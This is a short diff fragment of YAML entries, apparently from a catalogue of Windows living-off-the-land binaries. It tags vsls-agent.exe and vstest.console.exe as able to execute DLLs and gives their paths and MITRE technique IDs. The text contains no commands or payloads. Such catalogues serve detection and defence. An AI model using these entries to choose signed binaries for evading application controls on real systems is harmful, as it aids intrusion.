|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
|
||||
Detection:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
|
||||
|